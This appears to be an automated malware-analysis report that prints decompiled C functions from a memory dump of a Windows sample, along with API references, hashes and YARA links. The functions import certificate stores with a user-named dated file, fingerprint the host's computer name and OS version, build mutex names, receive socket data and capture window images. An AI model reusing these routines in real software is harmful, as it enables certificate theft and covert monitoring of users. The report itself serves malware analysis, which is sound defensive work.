0x00420611
0x00000000
0x00420611
0x00420536
0x00420538
0x00420540
0x00420543
0x00420551
0x00420558
0x0042055d
0x00420562
0x00000000
0x00000000
0x00420568
0x0042057c
0x0042058b
0x0042058f
0x004205e2
0x004205e9
0x004205ed
0x004205ef
0x004205f5
0x00000000
0x00000000
0x004205f5
0x00000000
0x004205e2
0x00420591
0x00420596
0x0042059d
0x004205b4
0x004205b8
0x00000000
0x00000000
0x004205ba
0x004205cb
0x004205d8
0x004205d8
0x00000000
0x004205cb
0x0042059f
0x004205a2
0x004205a8
0x004205ac
0x004205b2
0x00000000
0x00000000
0x00000000
0x004205b2
0x00000000
0x004205a2
0x004205fb
0x00420605
0x00000000
0x00420613
0x00420613
0x0042061c
0x0042061f
0x00420627
0x00000000

APIs

CoCreateInstance.OLE32 ref: 00420467
HeapFree.KERNEL32(?,00000000,00000000), ref: 00420672

Strings

d, xrefs: 0042057C

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFreeHeapInstance
String ID: d
API String ID: 2783224145-2564639436
Opcode ID: 0964ec3f97a9802f8aa6ed60f2fa9b76d32523cd66aa7e913250ccec7badf10d
Instruction ID: d4fbc3669c528c7789dc33733ea52d839242ad5847697b6884584b2ed1734400
Opcode Fuzzy Hash: 0964ec3f97a9802f8aa6ed60f2fa9b76d32523cd66aa7e913250ccec7badf10d
Instruction Fuzzy Hash: CF618C743043129FD714DF14D880AABB3E8AFC8748F50485EF9859B291D739ED4ACB66

Uniqueness

Uniqueness Score: -1.00%

Function 004234C0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108
timeCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E004234C0(intOrPtr __eax, intOrPtr* _a4, short* _a8, signed int _a12) {
				char _v536;
				char _v600;
				char _v728;
				char _v744;
				struct _SYSTEMTIME _v760;
				intOrPtr _v764;
				intOrPtr _v772;
				intOrPtr _v776;
				char _v784;
				void* __ebx;
				void* __esi;
				void* _t42;
				signed int _t45;
				void* _t54;
				intOrPtr* _t55;
				void* _t70;
				short* _t71;
				void* _t73;
				signed int _t74;
				char* _t77;
				signed int _t80;
				void* _t82;
				void* _t83;

				_t82 = (_t80 & 0xfffffff8) - 0x2fc;
				_t55 = _a4;
				_t74 = _a12;
				_t71 = _a8;
				__imp__PFXImportCertStore(_t55, _t71, _t74, _t70, _t73, _t54);
				_v776 = __eax;
				if(__eax == 0 || (_t74 & 0x10000000) != 0 || _t55 == 0 ||  *_t55 <= 0 ||  *((intOrPtr*)(_t55 + 4)) == 0 || E0041CFE0() == 0) {
					L15:
					return _v776;
				} else {
					GetSystemTime( &_v760);
					E00424100(0xaa,  &_v600);
					_t77 =  &_v744;
					E00424100(0xab, _t77);
					E00423230( &_v536);
					_push(_v760.wYear & 0x0000ffff);
					_push(_v760.wMonth & 0x0000ffff);
					_push(_v760.wDay & 0x0000ffff);
					_push(_t77);
					_push( &_v536);
					_t78 =  &_v728;
					_t42 = E00411D10( &_v600, 0x3e,  &_v728,  &_v600);
					_t83 = _t82 + 0x18;
					if(_t42 <= 0 || E0040D620( *_t55,  &_v728, 2, 0, _t78,  *((intOrPtr*)(_t55 + 4))) == 0 || _t71 == 0 ||  *_t71 == 0) {
						goto L15;
					} else {
						_t45 = 0;
						if(_v728 == 0) {
							L13:
							 *((short*)(E00410820(_t83 + 0x48 + _t45 * 2, L".txt", 8) + 8)) = 0;
							if(E00411EF0(_t47 | 0xffffffff,  &_v784, _t71) != 0) {
								E0040D620(_v764, _v772, 2, 0,  &_v728, _v772);
								E00411ED0( &_v784);
							}
							goto L15;
						}
						do {
							_t45 = _t45 + 1;
						} while ( *((short*)(_t83 + 0x40 + _t45 * 2)) != 0);
						goto L13;
					}
				}
			}

0x004234c6
0x004234cd
0x004234d1
0x004234d5
0x004234db
0x004234e1
0x004234e7
0x00423610
0x0042361a
0x00423521
0x00423526
0x00423538
0x0042353d
0x00423546
0x00423552
0x00423566
0x00423567
0x00423568
0x0042356b
0x00423573
0x00423581
0x00423585
0x0042358a
0x0042358f
0x00000000
0x004235b1
0x004235b1
0x004235b8
0x004235c9
0x004235dc
0x004235f0
0x00423604
0x0042360b
0x0042360b
0x00000000
0x004235f0
0x004235c0
0x004235c0
0x004235c1
0x00000000
0x004235c0
0x0042358f

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 004234DB

Part of subcall function 0041CFE0: WaitForSingleObject.KERNEL32(?,00000000,00423519), ref: 0041CFE8

GetSystemTime.KERNEL32(?), ref: 00423526

Part of subcall function 00423230: GetUserNameExW.SECUR32(00000002,?,?,?,?,004233D7,?,?,00403968,00000001), ref: 00423244

Strings

.txt, xrefs: 004235CB

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CertImportNameObjectSingleStoreSystemTimeUserWait
String ID: .txt
API String ID: 1412380219-2195685702
Opcode ID: 6636aed9de57ea8c3d54afaeaaa9c7fa6abbe0e821cf0ef9b2db7e8fd1b46098
Instruction ID: 49bb01059e0c09810645f442727d8a581b68c236f3fe7ed6893d6da392d1997e
Opcode Fuzzy Hash: 6636aed9de57ea8c3d54afaeaaa9c7fa6abbe0e821cf0ef9b2db7e8fd1b46098
Instruction Fuzzy Hash: 16316031604320A6CB20EF55D945BABB3FCAF84705F44492EBA84A7391D778DE44C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 0041D000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0041D000(void* __ebx, void* __edi, intOrPtr _a4) {
				char _v264;
				char _v284;
				intOrPtr _v296;
				char _v300;
				char _v388;
				char _v392;
				short _v456;
				char _v472;
				long _v504;
				char _v508;
				intOrPtr _v512;
				char _v516;
				intOrPtr _v520;
				void* __esi;
				int _t27;
				intOrPtr _t39;
				void* _t41;
				struct _OSVERSIONINFOW* _t54;
				void* _t59;
				intOrPtr _t71;

				_t59 = __edi;
				_t41 = __ebx;
				_t71 = _a4;
				_v504 = 0x28;
				if(GetComputerNameW( &_v456,  &_v504) == 0) {
					_t24 = E00424100(0xdc,  &_v456);
				}
				_t54 =  &_v284;
				E00410870(_t24, _t54, 0, 0x11c);
				_v296 = 0x11c;
				_t27 = GetVersionExW(_t54);
				if(_t27 != 0) {
					_push(0x100);
					_push(0);
					_push( &_v264);
				} else {
					_push(0x11c);
					_push(_t27);
					_push( &_v284);
				}
				E00410870(_t27);
				_push(_t41);
				_push(_t59);
				E00424100(0xd7,  &_v388);
				E00424100(0xd8,  &_v504);
				_v516 = E00416580(0x80000002,  &_v388,  &_v504);
				E00424100(0xd9,  &_v508);
				_v512 = E00416730( &_v508,  &_v392);
				E00424100(0xda,  &_v508);
				_push(E00412560( &_v516, 8));
				_push(E00412560( &_v300, 0x11c));
				_push( &_v472);
				_t69 = _t71;
				_t39 = E00411D10(_t38, 0x3c, _t71,  &_v508);
				_v520 = _t39;
				if(_t39 < 1) {
					return E00424100(0xdb, _t69);
				}
				return _t39;
			}

0x0041d000
0x0041d000
0x0041d007
0x0041d019
0x0041d029
0x0041d034
0x0041d034
0x0041d040
0x0041d048
0x0041d050
0x0041d05b
0x0041d063
0x0041d075
0x0041d07a
0x0041d083
0x0041d065
0x0041d065
0x0041d06a
0x0041d072
0x0041d072
0x0041d084
0x0041d089
0x0041d08a
0x0041d097
0x0041d0a5
0x0041d0c7
0x0041d0cb
0x0041d0e7
0x0041d0eb
0x0041d0fe
0x0041d110
0x0041d115
0x0041d120
0x0041d122
0x0041d12b
0x0041d133
0x00000000
0x0041d13a
0x0041d147

APIs

GetComputerNameW.KERNEL32 ref: 0041D021
GetVersionExW.KERNEL32 ref: 0041D05B

Strings

(, xrefs: 0041D019

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: ComputerNameVersion
String ID: (
API String ID: 3835364902-3887548279
Opcode ID: ce2eb826d164ab4c0298664d3c3b30ebf034708df98346be6e5d55764e81427c
Instruction ID: ddd1893d52ab8207418ae9bd97cf108c1ea9fccda328ff67ef874f88ae6b10e5
Opcode Fuzzy Hash: ce2eb826d164ab4c0298664d3c3b30ebf034708df98346be6e5d55764e81427c
Instruction Fuzzy Hash: E831EC756043109BD310EB51EC45BEBB798EBD4304F40482FFA45B7181DA78A9498BE6

Uniqueness

Uniqueness Score: -1.00%

Function 00416E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E00416E10(void* __ecx, void* __edx, signed char _a4, signed char _a6, signed char _a7, intOrPtr _a8, signed char _a12) {
				char _v268;
				signed int _v281;
				signed int _v282;
				signed int _v283;
				signed int _v284;
				signed int _v285;
				signed int _v286;
				signed int _v287;
				signed int _v288;
				signed int _v290;
				signed int _v292;
				signed int _v296;
				void* __esi;
				unsigned int _t38;
				signed char _t40;
				signed int _t42;
				void* _t43;
				signed int _t44;
				signed char _t51;
				char* _t52;
				signed char _t56;
				signed int _t59;
				intOrPtr _t61;

				_t61 = _a8;
				_t56 = _a4;
				_t38 = E00410820( &_v284, __ecx, 0x10);
				_v296 = _v296 ^ _t38;
				_v292 = _v292 ^ _t38;
				_t51 = _a7;
				_v288 = _v288 ^ _t56;
				_v284 = _v284 ^ _t56;
				_v287 = _v287 ^ _t56;
				_v285 = _v285 ^ _t51;
				_v283 = _v283 ^ _t56;
				_v290 = _v290 ^ _t38 >> 0x00000010;
				_t40 = _a6;
				_v286 = _v286 ^ _t40;
				_v282 = _v282 ^ _t40;
				_v281 = _v281 ^ _t51;
				if(__edx != 0) {
					E00412640(E00410820( &_v268, __edx, 0x102),  &_v296, 0x10);
				}
				_t42 = _a12 & 0x000000ff;
				if(_t42 != 0) {
					_t43 = _t42 - 1;
					if(_t43 == 0) {
						_t52 = L"Local\\";
						_t59 = 6;
						goto L7;
					} else {
						_t42 = _t43 - 1;
						if(_t42 == 0) {
							_t52 = L"Global\\";
							_t59 = _t42 + 7;
							L7:
							_t44 = _t59;
							if(_t59 == 0xffffffff) {
								_t44 = 0;
								if(_t52 != 0 &&  *_t52 != 0) {
									do {
										_t44 = _t44 + 1;
									} while ( *((short*)(_t52 + _t44 * 2)) != 0);
								}
							}
							_t42 = E00410820(_t61, _t52, _t44 + _t44);
							 *((short*)(_t42 + _t61)) = 0;
							_t61 = _t61 + _t59 * 2;
						}
					}
				}
				__imp__StringFromGUID2( &_v284, _t61, 0x28);
				return _t42;
			}

0x00416e1e
0x00416e2a
0x00416e2e
0x00416e33
0x00416e37
0x00416e3c
0x00416e3f
0x00416e43
0x00416e47
0x00416e4b
0x00416e4f
0x00416e56
0x00416e5b
0x00416e5e
0x00416e62
0x00416e68
0x00416e6e
0x00416e89
0x00416e89
0x00416e92
0x00416e95
0x00416e97
0x00416e98
0x00416ea7
0x00416eac
0x00000000
0x00416e9a
0x00416e9a
0x00416e9b
0x00416e9d
0x00416ea2
0x00416eb1
0x00416eb1
0x00416eb6
0x00416eb8
0x00416ebc
0x00416ec3
0x00416ec3
0x00416ec4
0x00416ec3
0x00416ebc
0x00416ed0
0x00416ed7
0x00416edb
0x00416edb
0x00416e9b
0x00416e98
0x00416ee6
0x00416ef1

APIs

StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6

Strings

Global\, xrefs: 00416E9D
Local\, xrefs: 00416EA7, 00416ECE

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FromString
String ID: Global\$Local\
API String ID: 1694596556-639276846
Opcode ID: c518a0106da20139d8f33b41c7c8c43373562c85c8e8f6ce46fc617e2a0b7c24
Instruction ID: 04790baba4c3299eb9599263e725de4ad42ce044e4b67c585554e638825a711d
Opcode Fuzzy Hash: c518a0106da20139d8f33b41c7c8c43373562c85c8e8f6ce46fc617e2a0b7c24
Instruction Fuzzy Hash: D721D63510C38566C715DF38C8019EB7BA59F85320F058A6FF494CB282D6B8DA89C3DA

Uniqueness

Uniqueness Score: -1.00%

Function 00414C40, Relevance: 3.1, APIs: 2, Instructions: 64networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,?,00000000,00000000,00007531), ref: 00414CC0
recv.WS2_32(00000104,?,00000001,00000000), ref: 00414CD0

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: recvselect
String ID:
API String ID: 741273618-0
Opcode ID: c5c604b8d716835f0f014b34ffa609f796aa81662f78c12c5ac338a8a61a655d
Instruction ID: 535ffc7b278af656be3e0e49c16c5856d713cc136f28e9798933aef5c9ea174e
Opcode Fuzzy Hash: c5c604b8d716835f0f014b34ffa609f796aa81662f78c12c5ac338a8a61a655d
Instruction Fuzzy Hash: D2112B325053045BD7348E24ED46BEFB7A9EBC1710F05863BE4159A2C0E779D6888BC9

Uniqueness

Uniqueness Score: -1.00%

Function 00410960, Relevance: 1.5, APIs: 1, Instructions: 24timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(00000000), ref: 0041096A

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: efa15127a66dc56a35fd09492d3f40f31a982295e21f84e2774c37a9e49f9d77
Instruction ID: 81dfcb3c4164417901333f5f42cda3c60566e4e87eaa59e29eaa24b6892b81a8
Opcode Fuzzy Hash: efa15127a66dc56a35fd09492d3f40f31a982295e21f84e2774c37a9e49f9d77
Instruction Fuzzy Hash: AAE08630754201CBFB34D6A4DD95BBAB3D4A781310F944939D4D6C2340E3ACD9D68643

Uniqueness

Uniqueness Score: -1.00%

Function 004022C3, Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
Instruction ID: 79b9a611a57bf3bb935c5fc068950a89b1943d6b5e2f4d02c3b8ec6b722c1236
Opcode Fuzzy Hash: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
Instruction Fuzzy Hash: 5F81A4319893918BCB95DF38C8D55D6BBB1EE4322432D85DDC8940EA03E22F651BDF51

Uniqueness

Uniqueness Score: -1.00%

Function 00414990, Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 766143754757ce5aad308cce4900a6aed3f8c689c36d3e9aab3f84479443c5fe
Instruction ID: 56903bac0f351fce5d1a365059303aa80449b4c84f08af9eb9cc4d12927fd2af
Opcode Fuzzy Hash: 766143754757ce5aad308cce4900a6aed3f8c689c36d3e9aab3f84479443c5fe
Instruction Fuzzy Hash: 0E513B7174970687D724CD69D4403A773D2FFC4360F29853EEA9647389E638DD86828E

Uniqueness

Uniqueness Score: -1.00%

Function 004140B0, Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b3aea5d00444873468e7664401794bb47df6129ae6776bf1bf31466806a9b31
Instruction ID: 49a91dff6aeb8ed94571ab67cb617a247d83e91d21f383ab1401fa5049b49e1d
Opcode Fuzzy Hash: 1b3aea5d00444873468e7664401794bb47df6129ae6776bf1bf31466806a9b31
Instruction Fuzzy Hash: 324185B15153508FD358CF1AC5809557FA2EFE932075A96DEC84A0FB63D734E885CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00412360, Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f40f1f7b26cd86ff72a81d4b16cf85ba098768b0e4676110ddf2f905b01bead9
Instruction ID: 1eba85b1233fa6ff755b0ef81b1a21fa650cdc5dc2af14858fe35f997b4944ee
Opcode Fuzzy Hash: f40f1f7b26cd86ff72a81d4b16cf85ba098768b0e4676110ddf2f905b01bead9
Instruction Fuzzy Hash: 94215E717308418BC75CDB3AE865A5A37E2E7893087E58A3DD522C32A0DA39E553CA0C

Uniqueness

Uniqueness Score: -1.00%

Function 00412374, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ae715a71ee183e21bfb48273e8f807bbf7fa15b7bfe7266f519b85a754c1b58
Instruction ID: ee9b6d92c36a49b2c8baa5cbe8d282f9b491da781e00aba67188c4bad002f51e
Opcode Fuzzy Hash: 3ae715a71ee183e21bfb48273e8f807bbf7fa15b7bfe7266f519b85a754c1b58
Instruction Fuzzy Hash: 55216F717308408BC36CDF3AEC55A5677E2F789308BA58A3CD522C32A0D639E513CA0C

Uniqueness

Uniqueness Score: -1.00%

Function 0041C4F0, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction ID: e7b5819828f861a78788df7e4cfa0e81d01a8e5003e6bddf1fb502bc4021d9b5
Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction Fuzzy Hash: 79E04F7A7801219BD755CE15D880983B7A7FBD8730B2286A5C81687346CA38FEC389D5

Uniqueness

Uniqueness Score: -1.00%

Function 0041B6E0, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 342
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041B6E0(RECT* __eax, void* __eflags, struct HWND__* _a8, char _a12) {
				intOrPtr _v0;
				struct HWND__* _v28;
				intOrPtr _v36;
				intOrPtr _v52;
				struct tagWINDOWINFO _v60;
				int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				struct tagPOINT* _v88;
				struct tagPOINT* _v92;
				struct HDC__* _v96;
				intOrPtr _v100;
				void _v104;
				struct tagRECT _v120;
				char _v124;
				struct tagRECT _v140;
				struct tagPOINT* _v144;
				signed int _v148;
				struct tagPOINT* _v152;
				signed int _v154;
				int _v156;
				int _v160;
				int _v164;
				char _v165;
				char _v166;
				int _v168;
				intOrPtr _v177;
				char _v193;
				signed int _t110;
				signed int _t116;
				signed char _t121;
				int _t125;
				char _t128;
				int _t131;
				signed int _t143;
				int _t157;
				signed int _t171;
				intOrPtr _t172;
				long _t173;
				intOrPtr _t176;
				long _t177;
				signed int _t182;
				signed int _t183;
				int _t184;
				long _t198;
				long _t199;
				long _t200;
				long _t201;
				struct HWND__* _t219;
				struct HDC__* _t221;
				int _t223;
				int _t224;
				RECT* _t225;
				struct HDC__* _t226;
				void* _t228;
				struct HWND__* _t230;

				_t219 = _a8;
				_t225 = __eax;
				_t110 = E004260D0(_t219) & 0x0000ffff;
				_v148 = _t110;
				if((_t110 & 0x00000001) == 0) {
					if(_t110 == 0) {
						_v148 = 2;
						_t110 = _v148;
					}
					if(_a12 != 0 && (_t110 & 0x00000002) != 0) {
						_v148 = _t110 & 0x0000fffd | 0x00000008;
					}
					_v144 = 0;
					_v152 = 0;
					_v140.left = 0;
					_v140.top = 0;
					_v60.cbSize = 0x3c;
					if(GetWindowInfo(_t219,  &_v60) == 0) {
						L28:
						return 0;
					} else {
						_t183 = _t182 & 0xffffff00 | IntersectRect( &(_v140.bottom),  &(_v60.rcWindow), _t225) != 0x00000000;
						if(_t183 != 0) {
							_t200 = _t225->top;
							_t176 = _v52;
							if(_t176 < _t200) {
								_v152 = _t176 - _t200;
							}
							_t201 = _t225->left;
							_t177 = _v60.rcWindow.left;
							if(_t177 < _t201) {
								_v144 = _t177 - _t201;
							}
						}
						_t116 = _v148 & 0x00000002;
						_v120.right = _t116;
						if(_t116 == 0) {
							_v154 = _t183;
						} else {
							if((_v60.dwStyle & 0x20000000) == 0) {
								_t171 = IntersectRect( &(_v120.bottom),  &(_v60.rcClient), _t225) & 0xffffff00 | _t170 != 0x00000000;
								_v154 = _t171;
								if(_t171 != 0) {
									_t198 = _t225->top;
									_t172 = _v36;
									if(_t172 < _t198) {
										_v140.top = _t172 - _t198;
									}
									_t199 = _t225->left;
									_t173 = _v60.rcClient.left;
									if(_t173 < _t199) {
										_v140.left = _t173 - _t199;
									}
								}
							} else {
								_v154 = 0;
							}
						}
						if(_t183 != 0 || _v154 != _t183) {
							_t221 = GetDC(0);
							if(_t221 == 0) {
								goto L28;
							} else {
								_t226 = CreateCompatibleDC(_t221);
								ReleaseDC(0, _t221);
								if(_t226 == 0) {
									goto L28;
								} else {
									_t222 = _v0;
									_t228 = SelectObject(_t226,  *(_v0 + 0x1c));
									_v144 = _t228;
									if(_t228 != 0) {
										_v165 = 1;
										if(_v124 == 0) {
											_t121 = _v160;
											if((_t121 & 0x00000004) == 0) {
												if((_t121 & 0x00000008) != 0) {
													_t125 = _v156;
													if(_t125 != 0 || _v164 != 0) {
														SetViewportOrgEx(_t226, _t125, _v164, 0);
													}
													_t128 = E0041B5B0(_t222,  &_v156, 0);
													__imp__PrintWindow(_v60.dwStyle, _t226, 0);
													if(_t128 != 0) {
														goto L56;
													} else {
														_v193 = _t128;
													}
												}
											} else {
												_t131 = _v156;
												if(_t131 != 0 || _v164 != 0) {
													SetViewportOrgEx(_t226, _t131, _v164, 0);
												}
												E0041B5B0(_t222,  &_v156, 0);
												DefWindowProcW(_v60.dwStyle, 0x317, _t226, 0xe);
												L56:
												E0041B5B0(_t222,  &_v168, 1);
											}
										} else {
											_v92 = 0;
											_v88 = 0;
											_v100 = _v60.atomWindowType;
											_v84 = _v120.right - _v120.left;
											_v96 = _t226;
											_v76 = 1;
											_v80 = _v120.bottom.left - _v120.top;
											TlsSetValue( *0x42eea4,  &_v104);
											if(_t183 == 1 && EqualRect( &_v120,  &_v140) == 0) {
												_t224 = SaveDC(_t226);
												_t157 = _v160;
												if(_t157 != 0 || _v168 != _t157) {
													SetViewportOrgEx(_t226, _t157, _v168, 0);
												}
												_t185 = _v28;
												E0041B5B0(_v28,  &_v160, 0);
												_v140.bottom.left = 0;
												SendMessageW(_v28, 0x85, 1, 0);
												if(_v140.bottom.left == 0) {
													DefWindowProcW(_v60.dwStyle, 0x317, _t226, 2);
												}
												E0041B5B0(_t185,  &_v160, 1);
												RestoreDC(_t226, _t224);
											}
											if(_v166 == 1) {
												if(_v152 != 0 || _v148 != 0) {
													_t184 = 1;
												} else {
													_t184 = 0;
												}
												_t223 = SaveDC(_t226);
												if(_t184 != 0) {
													SetViewportOrgEx(_t226, _v156, _v152, 0);
												}
												E0041B5B0(_v60.cxWindowBorders,  &_v124, 0);
												_t230 = _v60.cxWindowBorders;
												_t143 = SendMessageW(_t230, 0x14, _t226, 0);
												asm("sbb eax, eax");
												_v84 =  ~_t143 + 1;
												RestoreDC(_t226, _t223);
												if(_t184 != 0) {
													SetViewportOrgEx(_t226, _v164, _v160, 0);
												}
												_v120.top = 0;
												SendMessageW(_t230, 0xf, 0, 0);
												if(_v120.top == 0) {
													DefWindowProcW(_t230, 0x317, _t226, 4);
												}
												E0041B5B0(_v60.dwExStyle,  &(_v140.right), 1);
											}
											TlsSetValue( *0x42eea4, 0);
											_t228 = _v144;
										}
										SelectObject(_t226, _t228);
										DeleteDC(_t226);
										return _v177;
									} else {
										DeleteDC(_t226);
										goto L28;
									}
								}
							}
						} else {
							goto L1;
						}
					}
				} else {
					L1:
					return 1;
				}
			}

0x0041b6ea
0x0041b6f3
0x0041b6fa
0x0041b6fd
0x0041b703
0x0041b719
0x0041b71b
0x0041b723
0x0041b723
0x0041b72f
0x0041b73d
0x0041b73d
0x0041b747
0x0041b74b
0x0041b74f
0x0041b753
0x0041b757
0x0041b767
0x0041b86a
0x0041b876
0x0041b76d
0x0041b782
0x0041b787
0x0041b789
0x0041b78c
0x0041b792
0x0041b796
0x0041b796
0x0041b79a
0x0041b79c
0x0041b7a2
0x0041b7a6
0x0041b7a6
0x0041b7a2
0x0041b7ae
0x0041b7b1
0x0041b7b5
0x0041b811
0x0041b7b7
0x0041b7c2
0x0041b7dd
0x0041b7e0
0x0041b7e6
0x0041b7e8
0x0041b7eb
0x0041b7f4
0x0041b7f8
0x0041b7f8
0x0041b7fc
0x0041b7fe
0x0041b807
0x0041b80b
0x0041b80b
0x0041b807
0x0041b7c4
0x0041b7c4
0x0041b7c4
0x0041b7c2
0x0041b817
0x0041b82a
0x0041b82e
0x00000000
0x0041b830
0x0041b839
0x0041b83b
0x0041b843
0x00000000
0x0041b845
0x0041b845
0x0041b857
0x0041b85b
0x0041b861
0x0041b879
0x0041b883
0x0041ba54
0x0041ba5a
0x0041baca
0x0041bacc
0x0041bad2
0x0041bae2
0x0041bae2
0x0041baf0
0x0041bb00
0x0041bb08
0x00000000
0x0041bb0a
0x0041bb0a
0x0041bb0a
0x0041bb08
0x0041ba5c
0x0041ba5c
0x0041ba62
0x0041ba72
0x0041ba72
0x0041ba80
0x0041ba95
0x0041ba9b
0x0041baa3
0x0041baa3
0x0041b889
0x0041b898
0x0041b89c
0x0041b8a8
0x0041b8b0
0x0041b8bc
0x0041b8c0
0x0041b8c8
0x0041b8cc
0x0041b8db
0x0041b8fc
0x0041b8fe
0x0041b904
0x0041b915
0x0041b915
0x0041b91b
0x0041b92a
0x0041b940
0x0041b945
0x0041b950
0x0041b962
0x0041b962
0x0041b970
0x0041b977
0x0041b977
0x0041b982
0x0041b98d
0x0041b99a
0x0041b996
0x0041b996
0x0041b996
0x0041b99f
0x0041b9a3
0x0041b9b2
0x0041b9b2
0x0041b9c5
0x0041b9ca
0x0041b9d7
0x0041b9df
0x0041b9e4
0x0041b9e8
0x0041b9f0
0x0041b9ff
0x0041b9ff
0x0041ba0c
0x0041ba11
0x0041ba1c
0x0041ba27
0x0041ba27
0x0041ba3a
0x0041ba3a
0x0041ba48
0x0041ba4e
0x0041ba4e
0x0041baaa
0x0041bab1
0x0041bac5
0x0041b863
0x0041b864
0x00000000
0x0041b864
